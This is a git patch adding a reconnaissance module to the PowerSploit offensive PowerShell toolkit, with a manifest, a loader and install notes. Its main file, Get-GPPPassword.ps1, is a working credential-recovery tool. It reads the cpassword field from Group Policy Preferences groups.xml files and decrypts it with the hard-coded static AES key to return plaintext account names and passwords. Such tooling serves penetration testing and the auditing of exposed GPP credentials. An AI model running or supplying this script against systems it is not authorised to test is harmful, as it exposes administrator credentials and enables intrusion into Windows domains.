From b53b6a03a5d29a8145dc590d5945b41fe5ae07f7 Mon Sep 17 00:00:00 2001 From: bitform Date: Sun, 20 Jan 2013 21:32:27 -0500 Subject: Added 'Recon' Module --- Recon/Get-GPPPassword.ps1 | 98 +++++++++++++++++++++++++++++++++++++++++++++++ Recon/Recon.psd1 | 88 ++++++++++++++++++++++++++++++++++++++++++ Recon/Recon.psm1 | 1 + Recon/Usage.md | 12 ++++++ 4 files changed, 199 insertions(+) create mode 100644 Recon/Get-GPPPassword.ps1 create mode 100644 Recon/Recon.psd1 create mode 100644 Recon/Recon.psm1 create mode 100644 Recon/Usage.md diff --git a/Recon/Get-GPPPassword.ps1 b/Recon/Get-GPPPassword.ps1 new file mode 100644 index 0000000..99a694b --- /dev/null +++ b/Recon/Get-GPPPassword.ps1 @@ -0,0 +1,98 @@ +function Get-GPPPassword { + +<# +.Synopsis + + Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml. + Author: Chris Campbell (@obscuresec) + License: BSD 3-Clause + +.Description + + Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password. + +.Parameter Path + + The path to the targeted groups.xml file. + +.Example + + Get-GPPPassword -path c:\demo\groups.xml + +.Link + + http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences + http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +#> + +Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" ) + + #Function to pull encrypted password string from groups.xml + function Parse-cPassword { + + try { + [xml] $Xml = Get-Content ($Path) + [String] $Cpassword = $Xml.Groups.User.Properties.cpassword + } catch { Write-Error "No Password Policy Found in File!" } + + return $Cpassword + } + + #Function to look to see if the administrator account is given a newname + function Parse-NewName { + + [xml] $Xml = Get-Content ($Path) + [String] $NewName = $Xml.Groups.User.Properties.newName + + return $NewName + } + + #Function to parse out the Username whose password is being specified + function Parse-UserName { + + try { + [xml] $Xml = Get-Content ($Path) + [string] $UserName = $Xml.Groups.User.Properties.userName + } catch { Write-Error "No Username Specified in File!" } + + return $UserName + } + + #Function that decodes and decrypts password + function Decrypt-Password { + + try { + #Append appropriate padding based on string length + $Pad = "=" * (4 - ($Cpassword.length % 4)) + $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad) + #Create a new AES .NET Crypto Object + $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider + #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 + [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, + 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) + #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value + $AesIV = New-Object Byte[]($AesObject.IV.Length) + $AesObject.IV = $AesIV + $AesObject.Key = $AesKey + $DecryptorObject = $AesObject.CreateDecryptor() + [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length) + + return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) + } catch { Write-Error "Decryption Failed!" } + + } + + $Cpassword = Parse-cPassword + $Password = Decrypt-Password + $NewName = Parse-NewName + $UserName = Parse-UserName + + $Results = New-Object System.Object + + Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName + Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName + Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password + + return $Results + +} diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 new file mode 100644 index 0000000..59c6377 --- /dev/null +++ b/Recon/Recon.psd1 @@ -0,0 +1,88 @@ +@{ + +# Script module or binary module file associated with this manifest. +ModuleToProcess = 'Recon.psm1' + +# Version number of this module. +ModuleVersion = '1.0.0.0' + +# ID used to uniquely identify this module +GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' + +# Author of this module +Author = 'Matthew Graeber' + +# Company or vendor of this module +CompanyName = '' + +# Copyright statement for this module +Copyright = 'BSD 3-Clause' + +# Description of the functionality provided by this module +Description = 'PowerSploit Reconnaissance Module' + +# Minimum version of the Windows PowerShell engine required by this module +PowerShellVersion = '2.0' + +# Name of the Windows PowerShell host required by this module +# PowerShellHostName = '' + +# Minimum version of the Windows PowerShell host required by this module +# PowerShellHostVersion = '' + +# Minimum version of the .NET Framework required by this module +# DotNetFrameworkVersion = '' + +# Minimum version of the common language runtime (CLR) required by this module +# CLRVersion = '' + +# Processor architecture (None, X86, Amd64) required by this module +# ProcessorArchitecture = '' + +# Modules that must be imported into the global environment prior to importing this module +# RequiredModules = @() + +# Assemblies that must be loaded prior to importing this module +# RequiredAssemblies = @() + +# Script files (.ps1) that are run in the caller's environment prior to importing this module. +# ScriptsToProcess = '' + +# Type files (.ps1xml) to be loaded when importing this module +# TypesToProcess = @() + +# Format files (.ps1xml) to be loaded when importing this module +# FormatsToProcess = @() + +# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess +# NestedModules = @() + +# Functions to export from this module +FunctionsToExport = '*' + +# Cmdlets to export from this module +CmdletsToExport = '*' + +# Variables to export from this module +VariablesToExport = '' + +# Aliases to export from this module +AliasesToExport = '' + +# List of all modules packaged with this module. +ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) + +# List of all files packaged with this module +FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1', + 'Invoke-ReverseDnsLookup.ps1', 'Usage.md' + +# Private data to pass to the module specified in RootModule/ModuleToProcess +# PrivateData = '' + +# HelpInfo URI of this module +# HelpInfoURI = '' + +# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. +# DefaultCommandPrefix = '' + +} \ No newline at end of file diff --git a/Recon/Recon.psm1 b/Recon/Recon.psm1 new file mode 100644 index 0000000..e5234fb --- /dev/null +++ b/Recon/Recon.psm1 @@ -0,0 +1 @@ +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} \ No newline at end of file diff --git a/Recon/Usage.md b/Recon/Usage.md new file mode 100644 index 0000000..9bfe35e --- /dev/null +++ b/Recon/Usage.md @@ -0,0 +1,12 @@ +To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module Recon` + +To see the commands imported, type `Get-Command -Module Recon` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. \ No newline at end of file -- cgit v1.2.3